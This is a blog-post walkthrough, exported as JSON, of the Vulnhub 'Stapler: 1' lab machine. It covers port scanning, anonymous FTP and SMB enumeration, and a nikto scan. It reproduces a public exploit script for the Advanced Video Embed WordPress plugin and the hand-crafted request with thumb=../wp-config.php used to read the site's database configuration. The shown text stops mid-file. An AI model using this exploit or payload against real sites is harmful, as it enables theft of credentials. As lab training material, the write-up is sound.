{"id":1150,"date":"2021-05-30T20:07:24","date_gmt":"2021-05-30T20:07:24","guid":{"rendered":"http:\/\/144.76.171.171\/blog\/?p=1150"},"modified":"2021-05-30T20:18:16","modified_gmt":"2021-05-30T20:18:16","slug":"stapler-1","status":"publish","type":"post","link":"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/05\/30\/stapler-1\/","title":{"rendered":"STAPLER: 1"},"content":{"rendered":"<h2>About the Machine<\/h2>\n<p><strong>Description:<\/strong><br \/>\nAverage beginner\/intermediate VM, only a few twists<br \/>\nMay find it easy\/hard (depends on YOUR background)<br \/>\n...also which way you attack the box<br \/>\nIt SHOULD work on both VMware and Virtualbox<br \/>\nREBOOT the VM if you CHANGE network modes<br \/>\nFusion users, you'll need to retry when importing<\/p>\n<p><strong>Vulnhub Page:<\/strong><br \/>\n<a href=\"http:\/\/144.76.171.171\/blog\/index.php\/fristileaks-1-3\/\">http:\/\/144.76.171.171\/blog\/index.php\/fristileaks-1-3\/<\/a><\/p>\n<p><strong>Download Page:<\/strong> <a href=\"https:\/\/download.vulnhub.com\/stapler\/Stapler.zip\">https:\/\/download.vulnhub.com\/stapler\/Stapler.zip<\/a><\/p>\n<h2>Walkthrough<\/h2>\n<p>Let's start by identifying the target machine's IP address.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ifconfig eth0                                                                                                                                       130 \u2a2f\neth0: flags=4163&lt;UP,BROADCAST,RUNNING,MULTICAST&gt;  mtu 1500\n        inet 192.168.0.21  netmask 255.255.255.0  broadcast 192.168.0.255\n        inet6 fe80::20c:29ff:fe4a:4d3f  prefixlen 64  scopeid 0x20&lt;link&gt;\n        ether 00:0c:29:4a:4d:3f  txqueuelen 1000  (Ethernet)\n        RX packets 5680  bytes 995112 (971.7 KiB)\n        RX errors 0  dropped 0  overruns 0  frame 0\n        TX packets 9958  bytes 1268241 (1.2 
MiB)\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# arp-scan -l | grep 08:00:27:ba:ad:72\n192.168.0.25    08:00:27:ba:ad:72   PCS Systemtechnik GmbH\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# \n<\/code><\/pre>\n<p>Let's run an nmap scan.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# nmap 192.168.0.25 -p- -A    \nStarting Nmap 7.91 ( https:\/\/nmap.org ) at 2021-05-29 19:44 EDT\nNmap scan report for 192.168.0.25\nHost is up (0.0010s latency).\nNot shown: 65523 filtered ports\nPORT      STATE  SERVICE     VERSION\n20\/tcp    closed ftp-data\n21\/tcp    open   ftp         vsftpd 2.0.8 or later\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\n|_Can&#039;t get directory listing: PASV failed: 550 Permission denied.\n| ftp-syst: \n|   STAT: \n| FTP server status:\n|      Connected to 192.168.0.21\n|      Logged in as ftp\n|      TYPE: ASCII\n|      No session bandwidth limit\n|      Session timeout in seconds is 300\n|      Control connection is plain text\n|      Data connections will be plain text\n|      At session startup, client count was 1\n|      vsFTPd 3.0.3 - secure, fast, stable\n|_End of status\n22\/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 81:21:ce:a1:1a:05:b1:69:4f:4d:ed:80:28:e8:99:05 (RSA)\n|   256 5b:a5:bb:67:91:1a:51:c2:d3:21:da:c0:ca:f0:db:9e (ECDSA)\n|_  256 6d:01:b7:73:ac:b0:93:6f:fa:b9:89:e6:ae:3c:ab:d3 (ED25519)\n53\/tcp    open   domain      dnsmasq 2.75\n| dns-nsid: \n|_  bind.version: dnsmasq-2.75\n80\/tcp    open   http        PHP cli server 5.5 or later\n|_http-title: 404 Not Found\n123\/tcp   closed ntp\n137\/tcp   closed netbios-ns\n138\/tcp   closed netbios-dgm\n139\/tcp   open   netbios-ssn Samba smbd 4.3.9-Ubuntu 
(workgroup: WORKGROUP)\n666\/tcp   open   doom?\n| fingerprint-strings: \n|   NULL: \n|     message2.jpgUT \n|     QWux\n|     &quot;DL[E\n|     #;3[\n|     \\xf6\n|     u([r\n|     qYQq\n|     Y_?n2\n|     3&amp;M~{\n|     9-a)T\n|     L}AJ\n|_    .npy.9\n3306\/tcp  open   mysql       MySQL 5.7.12-0ubuntu1\n| mysql-info: \n|   Protocol: 10\n|   Version: 5.7.12-0ubuntu1\n|   Thread ID: 8\n|   Capabilities flags: 63487\n|   Some Capabilities: IgnoreSpaceBeforeParenthesis, Support41Auth, DontAllowDatabaseTableColumn, SupportsTransactions, FoundRows, Speaks41ProtocolOld, Speaks41ProtocolNew, InteractiveClient, LongPassword, SupportsCompression, ConnectWithDatabase, IgnoreSigpipes, LongColumnFlag, SupportsLoadDataLocal, ODBCClient, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults\n|   Status: Autocommit\n|   Salt: \\x07{J\\I;+o\\x08\\x03r\\x17j\\x16\\x1F\\x10m=\\x16\\x08\n|_  Auth Plugin Name: mysql_native_password\n12380\/tcp open   http        Apache httpd 2.4.18 ((Ubuntu))\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\n|_http-title: Site doesn&#039;t have a title (text\/html).\n1 service unrecognized despite returning data. 
If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port666-TCP:V=7.91%I=7%D=5\/29%Time=60B2D232%P=x86_64-pc-linux-gnu%r(NUL\nSF:L,1350,&quot;PK\\x03\\x04\\x14\\0\\x02\\0\\x08\\0d\\x80\\xc3Hp\\xdf\\x15\\x81\\xaa,\\0\\0\\x1\nSF:52\\0\\0\\x0c\\0\\x1c\\0message2\\.jpgUT\\t\\0\\x03\\+\\x9cQWJ\\x9cQWux\\x0b\\0\\x01\\x0\nSF:4\\xf5\\x01\\0\\0\\x04\\x14\\0\\0\\0\\xadz\\x0bT\\x13\\xe7\\xbe\\xefP\\x94\\x88\\x88A@\\xa\nSF:2\\x20\\x19\\xabUT\\xc4T\\x11\\xa9\\x102&gt;\\x8a\\xd4RDK\\x15\\x85Jj\\xa9\\&quot;DL\\[E\\xa2\\\nSF:x0c\\x19\\x140&lt;\\xc4\\xb4\\xb5\\xca\\xaen\\x89\\x8a\\x8aV\\x11\\x91W\\xc5H\\x20\\x0f\\x\nSF:b2\\xf7\\xb6\\x88\\n\\x82@%\\x99d\\xb7\\xc8#;3\\[\\r_\\xcddr\\x87\\xbd\\xcf9\\xf7\\xaeu\nSF:\\xeeY\\xeb\\xdc\\xb3oX\\xacY\\xf92\\xf3e\\xfe\\xdf\\xff\\xff\\xff=2\\x9f\\xf3\\x99\\xd\nSF:3\\x08y}\\xb8a\\xe3\\x06\\xc8\\xc5\\x05\\x82&gt;`\\xfe\\x20\\xa7\\x05:\\xb4y\\xaf\\xf8\\xa\nSF:0\\xf8\\xc0\\^\\xf1\\x97sC\\x97\\xbd\\x0b\\xbd\\xb7nc\\xdc\\xa4I\\xd0\\xc4\\+j\\xce\\[\\x\nSF:87\\xa0\\xe5\\x1b\\xf7\\xcc=,\\xce\\x9a\\xbb\\xeb\\xeb\\xdds\\xbf\\xde\\xbd\\xeb\\x8b\\x\nSF:f4\\xfdis\\x0f\\xeeM\\?\\xb0\\xf4\\x1f\\xa3\\xcceY\\xfb\\xbe\\x98\\x9b\\xb6\\xfb\\xe0\\x\nSF:dc\\]sS\\xc5bQ\\xfa\\xee\\xb7\\xe7\\xbc\\x05AoA\\x93\\xfe9\\xd3\\x82\\x7f\\xcc\\xe4\\xd\nSF:5\\x1dx\\xa2O\\x0e\\xdd\\x994\\x9c\\xe7\\xfe\\x871\\xb0N\\xea\\x1c\\x80\\xd63w\\xf1\\xa\nSF:f\\xbd&amp;&amp;q\\xf9\\x97&#039;i\\x85fL\\x81\\xe2\\\\\\xf6\\xb9\\xba\\xcc\\x80\\xde\\x9a\\xe1\\xe2:\nSF:\\xc3\\xc5\\xa9\\x85`\\x08r\\x99\\xfc\\xcf\\x13\\xa0\\x7f{\\xb9\\xbc\\xe5:i\\xb2\\x1bk\\\nSF:x8a\\xfbT\\x0f\\xe6\\x84\\x06\/\\xe8-\\x17W\\xd7\\xb7&amp;\\xb9N\\x9e&lt;\\xb1\\\\\\.\\xb9\\xcc\\\nSF:xe7\\xd0\\xa4\\x19\\x93\\xbd\\xdf\\^\\xbe\\xd6\\xcdg\\xcb\\.\\xd6\\xbc\\xaf\\|W\\x1c\\xfd\nSF:\\xf6\\xe2\\x94\\xf9\\xebj\\xdbf~\\xfc\\x98x&#039;\\xf4\\xf3\\xaf\\x8f\\xb9O\\xf5\\xe3\\xcc\\\nSF:x9a\\xed\\xbf`a\\xd0\\xa2\\xc5KV\\x86\\xad\\n\\x7fou\\xc4\\xfa\\xf7\\xa
37\\xc4\\|\\xb0\\\nSF:xf1\\xc3\\x84O\\xb6nK\\xdc\\xbe#\\)\\xf5\\x8b\\xdd{\\xd2\\xf6\\xa6g\\x1c8\\x98u\\(\\[r\\\nSF:xf8H~A\\xe1qYQq\\xc9w\\xa7\\xbe\\?}\\xa6\\xfc\\x0f\\?\\x9c\\xbdTy\\xf9\\xca\\xd5\\xaak\nSF:\\xd7\\x7f\\xbcSW\\xdf\\xd0\\xd8\\xf4\\xd3\\xddf\\xb5F\\xabk\\xd7\\xff\\xe9\\xcf\\x7fy\\\nSF:xd2\\xd5\\xfd\\xb4\\xa7\\xf7Y_\\?n2\\xff\\xf5\\xd7\\xdf\\x86\\^\\x0c\\x8f\\x90\\x7f\\x7f\nSF:\\xf9\\xea\\xb5m\\x1c\\xfc\\xfef\\&quot;\\.\\x17\\xc8\\xf5\\?B\\xff\\xbf\\xc6\\xc5,\\x82\\xcb\\\nSF:[\\x93&amp;\\xb9NbM\\xc4\\xe5\\xf2V\\xf6\\xc4\\t3&amp;M~{\\xb9\\x9b\\xf7\\xda-\\xac\\]_\\xf9\\x\nSF:cc\\[qt\\x8a\\xef\\xbao\/\\xd6\\xb6\\xb9\\xcf\\x0f\\xfd\\x98\\x98\\xf9\\xf9\\xd7\\x8f\\xa\nSF:7\\xfa\\xbd\\xb3\\x12_@N\\x84\\xf6\\x8f\\xc8\\xfe{\\x81\\x1d\\xfb\\x1fE\\xf6\\x1f\\x81\\\nSF:xfd\\xef\\xb8\\xfa\\xa1i\\xae\\.L\\xf2\\\\g@\\x08D\\xbb\\xbfp\\xb5\\xd4\\xf4Ym\\x0bI\\x9\nSF:6\\x1e\\xcb\\x879-a\\)T\\x02\\xc8\\$\\x14k\\x08\\xae\\xfcZ\\x90\\xe6E\\xcb&lt;C\\xcap\\x8f\nSF:\\xd0\\x8f\\x9fu\\x01\\x8dvT\\xf0&#039;\\x9b\\xe4ST%\\x9f5\\x95\\xab\\rSWb\\xecN\\xfb&amp;\\xf4\nSF:\\xed\\xe3v\\x13O\\xb73A#\\xf0,\\xd5\\xc2\\^\\xe8\\xfc\\xc0\\xa7\\xaf\\xab4\\xcfC\\xcd\\\nSF:x88\\x8e}\\xac\\x15\\xf6~\\xc4R\\x8e`wT\\x96\\xa8KT\\x1cam\\xdb\\x99f\\xfb\\n\\xbc\\xb\nSF:cL}AJ\\xe5H\\x912\\x88\\(O\\0k\\xc9\\xa9\\x1a\\x93\\xb8\\x84\\x8fdN\\xbf\\x17\\xf5\\xf0\nSF:\\.npy\\.9\\x04\\xcf\\x14\\x1d\\x89Rr9\\xe4\\xd2\\xae\\x91#\\xfbOg\\xed\\xf6\\x15\\x04\\\nSF:xf6~\\xf1\\]V\\xdcBGu\\xeb\\xaa=\\x8e\\xef\\xa4HU\\x1e\\x8f\\x9f\\x9bI\\xf4\\xb6GTQ\\x\nSF:f3\\xe9\\xe5\\x8e\\x0b\\x14L\\xb2\\xda\\x92\\x12\\xf3\\x95\\xa2\\x1c\\xb3\\x13\\*P\\x11\\\nSF:?\\xfb\\xf3\\xda\\xcaDfv\\x89`\\xa9\\xe4k\\xc4S\\x0e\\xd6P0&quot;);\nMAC Address: 08:00:27:BA:AD:72 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: Host: RED; OS: Linux; CPE: 
cpe:\/o:linux:linux_kernel\n\nHost script results:\n|_clock-skew: mean: 2h39m58s, deviation: 34m37s, median: 2h59m57s\n|_nbstat: NetBIOS name: RED, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: &lt;unknown&gt; (unknown)\n| smb-os-discovery: \n|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)\n|   Computer name: red\n|   NetBIOS computer name: RED\\x00\n|   Domain name: \\x00\n|   FQDN: red\n|_  System time: 2021-05-30T03:46:06+01:00\n| smb-security-mode: \n|   account_used: guest\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: disabled (dangerous, but default)\n| smb2-security-mode: \n|   2.02: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2021-05-30T02:46:05\n|_  start_date: N\/A\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   1.03 ms 192.168.0.25\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 154.42 seconds\n<\/code><\/pre>\n<p>Now let's assess the results. FTP anonymous login is allowed. We also have SSH, HTTP servers, MySQL and Samba. There are plenty of services to gather information from. Let's get started.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ftp 192.168.0.25 \nConnected to 192.168.0.25.\n220-\n220-|-----------------------------------------------------------------------------------------|\n220-| Harry, make sure to update the banner when you get a chance to show who has access here |\n220-|-----------------------------------------------------------------------------------------|\n220-\n220 \nName (192.168.0.25:kali): Anonymous\n331 Please specify the password.\nPassword:\n230 Login successful.\nRemote system type is UNIX.\nUsing binary mode to transfer files.\nftp&gt; ls\n200 PORT command successful. 
Consider using PASV.\n150 Here comes the directory listing.\n-rw-r--r--    1 0        0             107 Jun 03  2016 note\n226 Directory send OK.\nftp&gt; get note\nlocal: note remote: note\n200 PORT command successful. Consider using PASV.\n150 Opening BINARY mode data connection for note (107 bytes).\n226 Transfer complete.\n107 bytes received in 0.00 secs (37.0015 kB\/s)\nftp&gt; bye\n221 Goodbye.\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat note                                  \nElly, make sure you update the payload information. Leave it in your FTP account once your are done, John.\n<\/code><\/pre>\n<p>I think we have obtained some users. I then ran an enum4linux scan. The output is below:<\/p>\n<pre><code class=\"language-sh\">\n ========================================= \n|    Share Enumeration on 192.168.0.25    |\n ========================================= \n\n    Sharename       Type      Comment\n    ---------       ----      -------\n    print$          Disk      Printer Drivers\n    kathy           Disk      Fred, What are we doing here?\n    tmp             Disk      All temporary files should be stored here\n    IPC$            IPC       IPC Service (red server (Samba, Ubuntu))\nSMB1 disabled -- no workgroup available\n\n[+] Attempting to map shares on 192.168.0.25\n\/\/192.168.0.25\/print$   Mapping: DENIED, Listing: N\/A\n\/\/192.168.0.25\/kathy    Mapping: OK, Listing: OK\n\/\/192.168.0.25\/tmp  Mapping: OK, Listing: OK\n\/\/192.168.0.25\/IPC$ [E] Can&#039;t understand response:\nNT_STATUS_OBJECT_NAME_NOT_FOUND listing \\*\n\n...\n\n[+] Enumerating users using SID S-1-22-1 and logon username &#039;&#039;, password &#039;&#039;\nS-1-22-1-1000 Unix User\\peter (Local User)\nS-1-22-1-1001 Unix User\\RNunemaker (Local User)\nS-1-22-1-1002 Unix User\\ETollefson (Local User)\nS-1-22-1-1003 Unix 
User\\DSwanger (Local User)\nS-1-22-1-1004 Unix User\\AParnell (Local User)\nS-1-22-1-1005 Unix User\\SHayslett (Local User)\nS-1-22-1-1006 Unix User\\MBassin (Local User)\nS-1-22-1-1007 Unix User\\JBare (Local User)\nS-1-22-1-1008 Unix User\\LSolum (Local User)\nS-1-22-1-1009 Unix User\\IChadwick (Local User)\nS-1-22-1-1010 Unix User\\MFrei (Local User)\nS-1-22-1-1011 Unix User\\SStroud (Local User)\nS-1-22-1-1012 Unix User\\CCeaser (Local User)\nS-1-22-1-1013 Unix User\\JKanode (Local User)\nS-1-22-1-1014 Unix User\\CJoo (Local User)\nS-1-22-1-1015 Unix User\\Eeth (Local User)\nS-1-22-1-1016 Unix User\\LSolum2 (Local User)\nS-1-22-1-1017 Unix User\\JLipps (Local User)\nS-1-22-1-1018 Unix User\\jamie (Local User)\nS-1-22-1-1019 Unix User\\Sam (Local User)\nS-1-22-1-1020 Unix User\\Drew (Local User)\nS-1-22-1-1021 Unix User\\jess (Local User)\nS-1-22-1-1022 Unix User\\SHAY (Local User)\nS-1-22-1-1023 Unix User\\Taylor (Local User)\nS-1-22-1-1024 Unix User\\mel (Local User)\nS-1-22-1-1025 Unix User\\kai (Local User)\nS-1-22-1-1026 Unix User\\zoe (Local User)\nS-1-22-1-1027 Unix User\\NATHAN (Local User)\nS-1-22-1-1028 Unix User\\www (Local User)\nS-1-22-1-1029 Unix User\\elly (Local User)<\/code><\/pre>\n<p>We obtained users and shared folders. Let's examine them.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# smbclient \/\/192.168.0.25\/kathy\nEnter WORKGROUP\\root&#039;s password: \nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Fri Jun  3 12:52:52 2016\n  ..                                  D        0  Mon Jun  6 17:39:56 2016\n  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016\n  backup                              D        0  Sun Jun  5 11:04:14 2016\n\n        19478204 blocks of size 1024. 
16397096 blocks available\nsmb: \\&gt; cd kathy_stuff\nsmb: \\kathy_stuff\\&gt; ls\n  .                                   D        0  Sun Jun  5 11:02:27 2016\n  ..                                  D        0  Fri Jun  3 12:52:52 2016\n  todo-list.txt                       N       64  Sun Jun  5 11:02:27 2016\n\n        19478204 blocks of size 1024. 16397096 blocks available\nsmb: \\kathy_stuff\\&gt; get todo-list.txt\ngetting file \\kathy_stuff\\todo-list.txt of size 64 as todo-list.txt (10.4 KiloBytes\/sec) (average 10.4 KiloBytes\/sec)\nsmb: \\kathy_stuff\\&gt; cd ..\nsmb: \\&gt; ls\n  .                                   D        0  Fri Jun  3 12:52:52 2016\n  ..                                  D        0  Mon Jun  6 17:39:56 2016\n  kathy_stuff                         D        0  Sun Jun  5 11:02:27 2016\n  backup                              D        0  Sun Jun  5 11:04:14 2016\n\n        19478204 blocks of size 1024. 16397096 blocks available\nsmb: \\&gt; cd backup\\\nsmb: \\backup\\&gt; ls\n  .                                   D        0  Sun Jun  5 11:04:14 2016\n  ..                                  D        0  Fri Jun  3 12:52:52 2016\n  vsftpd.conf                         N     5961  Sun Jun  5 11:03:45 2016\n  wordpress-4.tar.gz                  N  6321767  Mon Apr 27 13:14:46 2015\n\n        19478204 blocks of size 1024. 
16397096 blocks available\nsmb: \\backup\\&gt; get vsftpd.conf\ngetting file \\backup\\vsftpd.conf of size 5961 as vsftpd.conf (646.8 KiloBytes\/sec) (average 392.3 KiloBytes\/sec)\nsmb: \\backup\\&gt; exit\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ls\nnote  todo-list.txt  vsftpd.conf\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat todo-list.txt                         \nI&#039;m making sure to backup anything important for Initech, Kathy\n<\/code><\/pre>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler\/wordpress]\n\u2514\u2500# smbclient \/\/192.168.0.25\/tmp  \nEnter WORKGROUP\\root&#039;s password: \nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; ls\n  .                                   D        0  Tue Jun  7 04:08:39 2016\n  ..                                  D        0  Mon Jun  6 17:39:56 2016\n  ls                                  N      274  Sun Jun  5 11:32:58 2016\n\nsmb: \\&gt; exit\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler\/wordpress]\n\u2514\u2500# cat ls         \n.:\ntotal 12.0K\ndrwxrwxrwt  2 root root 4.0K Jun  5 16:32 .\ndrwxr-xr-x 16 root root 4.0K Jun  3 22:06 ..\n-rw-r--r--  1 root root    0 Jun  5 16:32 ls\ndrwx------  3 root root 4.0K Jun  5 15:32 systemd-private-df2bff9b90164a2eadc490c0b8f76087-systemd-timesyncd.service-vFKoxJ\n<\/code><\/pre>\n<p>The information I gathered about SMB is above. 
Let's continue.<br \/>\nNikto really is a tool that deserves credit; the information it provided made my job much easier.<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# nikto -h http:\/\/192.168.0.25:12380\/\n- Nikto v2.1.6\n---------------------------------------------------------------------------\n+ Target IP:          192.168.0.25\n+ Target Hostname:    192.168.0.25\n+ Target Port:        12380\n---------------------------------------------------------------------------\n+ SSL Info:        Subject:  \/C=UK\/ST=Somewhere in the middle of nowhere\/L=Really, what are you meant to put here?\/O=Initech\/OU=Pam: I give up. no idea what to put here.\/CN=Red.Initech\/emailAddress=pam@red.localhost\n                   Ciphers:  ECDHE-RSA-AES256-GCM-SHA384\n                   Issuer:   \/C=UK\/ST=Somewhere in the middle of nowhere\/L=Really, what are you meant to put here?\/O=Initech\/OU=Pam: I give up. no idea what to put here.\/CN=Red.Initech\/emailAddress=pam@red.localhost\n+ Start Time:         2021-05-29 20:12:28 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.18 (Ubuntu)\n+ The anti-clickjacking X-Frame-Options header is not present.\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\n+ Uncommon header &#039;dave&#039; found, with contents: Soemthing doesn&#039;t look right here\n+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.\n+ The site uses SSL and Expect-CT header is not present.\n+ The X-Content-Type-Options header is not set. 
This could allow the user agent to render the content of the site in a different fashion to the MIME type\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ Entry &#039;\/admin112233\/&#039; in robots.txt returned a non-forbidden or redirect HTTP code (200)\n+ Entry &#039;\/blogblog\/&#039; in robots.txt returned a non-forbidden or redirect HTTP code (200)\n+ &quot;robots.txt&quot; contains 2 entries which should be manually viewed.\n+ Apache\/2.4.18 appears to be outdated (current is at least Apache\/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.\n+ Hostname &#039;192.168.0.25&#039; does not match certificate&#039;s names: Red.Initech\n+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS \n+ Uncommon header &#039;x-ob_mode&#039; found, with contents: 1\n+ OSVDB-3233: \/icons\/README: Apache default file found.\n+ \/phpmyadmin\/: phpMyAdmin directory found\n+ 8071 requests: 0 error(s) and 15 item(s) reported on remote host\n+ End Time:           2021-05-29 20:23:38 (GMT-4) (670 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested\n<\/code><\/pre>\n<p>The server returned a 400 code when I connected over http, but I got a 200 HTTP code when I connected over https. I identified a WordPress site and scanned it with wpscan using its API. Naturally this produced a lot of findings, but the most important one was the <strong>advanced-video-embed-embed-videos-or-playlists\/<\/strong> plugin, which I found at <a href=\"https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/plugins\/\">https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/plugins\/<\/a>. 
<\/p>\n<pre><code class=\"language-sh\">\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# searchsploit advanced video wordpress\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\n Exploit Title                                                                                                                                                                                             |  Path\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nWordPress Plugin Advanced Video 1.0 - Local File Inclusion                                                                                                                                                 | php\/webapps\/39646.py\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------\nShellcodes: No Results\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# locate php\/webapps\/39646.py                             \n\/usr\/share\/exploitdb\/exploits\/php\/webapps\/39646.py\ncp                                                                                                                                                                                                                                             \n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cp \/usr\/share\/exploitdb\/exploits\/php\/webapps\/39646.py . 
\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat 39646.py                                           \n#!\/usr\/bin\/env python\n\n# Exploit Title: Advanced-Video-Embed Arbitrary File Download \/ Unauthenticated Post Creation\n# Google Dork: N\/A\n# Date: 04\/01\/2016\n# Exploit Author: evait security GmbH\n# Vendor Homepage: arshmultani - http:\/\/dscom.it\/\n# Software Link: https:\/\/wordpress.org\/plugins\/advanced-video-embed-embed-videos-or-playlists\/\n# Version: 1.0\n# Tested on: Linux Apache \/ WordPress 4.2.2\n\n#   Timeline\n#   03\/24\/2016 - Bug discovered\n#   03\/24\/2016 - Initial notification of vendor\n#   04\/01\/2016 - No answer from vendor, public release of bug \n\n# Vulnerable Code (\/inc\/classes\/class.avePost.php) Line 57:\n\n#  function ave_publishPost(){\n#    $title = $_REQUEST[&#039;title&#039;];\n#    $term = $_REQUEST[&#039;term&#039;];\n#    $thumb = $_REQUEST[&#039;thumb&#039;];\n# &lt;snip&gt;\n# Line 78:\n#    $image_data = file_get_contents($thumb);\n\n# POC - http:\/\/127.0.0.1\/wordpress\/wp-admin\/admin-ajax.php?action=ave_publishPost&amp;title=random&amp;short=1&amp;term=1&amp;thumb=[FILEPATH]\n\n# Exploit - Print the content of wp-config.php in terminal (default WordPress config)\n\nimport random\nimport urllib2\nimport re\n\nurl = &quot;http:\/\/127.0.0.1\/wordpress&quot; # insert url to wordpress\n\nrandomID = long(random.random() * 100000000000000000L)\n\nobjHtml = urllib2.urlopen(url + &#039;\/wp-admin\/admin-ajax.php?action=ave_publishPost&amp;title=&#039; + str(randomID) + &#039;&amp;short=rnd&amp;term=rnd&amp;thumb=..\/wp-config.php&#039;)\ncontent =  objHtml.readlines()\nfor line in content:\n    numbers = re.findall(r&#039;\\d+&#039;,line)\n    id = numbers[-1]\n    id = int(id) \/ 10\n\nobjHtml = urllib2.urlopen(url + &#039;\/?p=&#039; + str(id))\ncontent = objHtml.readlines()\n\nfor line in content:\n    if &#039;attachment-post-thumbnail size-post-thumbnail 
wp-post-image&#039; in line:\n        urls=re.findall(&#039;&quot;(https?:\/\/.*?)&quot;&#039;, line)\n        print urllib2.urlopen(urls[0]).read()     <\/code><\/pre>\n<p>Our plugin is also version 1, so the versions match. There is also an exploit for it. After reading the code, I carried out the steps myself. I sent a request of the form <a href=\"https:\/\/192.168.0.25:12380\/blogblog\/\/wp-admin\/admin-ajax.php?action=ave_publishPost&amp;title=1822&amp;short=rnd&amp;term=rnd&amp;thumb=..\/wp-config.php\">https:\/\/192.168.0.25:12380\/blogblog\/\/wp-admin\/admin-ajax.php?action=ave_publishPost&title=1822&short=rnd&term=rnd&thumb=..\/wp-config.php<\/a>. Then, in the browser, I went to the <a href=\"https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/uploads\/\">https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/uploads\/<\/a> folder and downloaded the images there to my Kali machine. When I read these image files with cat, I was able to get the data I was after.<\/p>\n<pre><code class=\"language-sh\">\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# wget https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/uploads\/1022270830.jpeg --no-check-certificate                                            \n--2021-05-29 21:09:24--  https:\/\/192.168.0.25:12380\/blogblog\/wp-content\/uploads\/1022270830.jpeg\nConnecting to 192.168.0.25:12380... connected.\nWARNING: The certificate of \u2018192.168.0.25\u2019 is not trusted.\nWARNING: The certificate of \u2018192.168.0.25\u2019 doesn&#039;t have a known issuer.\nThe certificate&#039;s owner does not match hostname \u2018192.168.0.25\u2019\nHTTP request sent, awaiting response... 
200 OK\nLength: 3042 (3.0K) [image\/jpeg]\nSaving to: \u20181022270830.jpeg\u2019\n\n1022270830.jpeg                                             100%[========================================================================================================================================&gt;]   2.97K  --.-KB\/s    in 0s      \n\n2021-05-29 21:09:24 (66.0 MB\/s) - \u20181022270830.jpeg\u2019 saved [3042\/3042]\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# ls                                                                                                                                            \n1022270830.jpeg  39646.py  cer.cer  note  todo-list.txt  vsftpd.conf  wordpress  wordpress-4.tar.gz  wpresult\n\n\u250c\u2500\u2500(root&#x1f480;kali)-[\/home\/kali\/oscp\/stapler]\n\u2514\u2500# cat 1022270830.jpeg                                                                                                                           \n&lt;?php\n\/**\n * The base configurations of the WordPress.\n *\n * This file has the following configurations: MySQL settings, 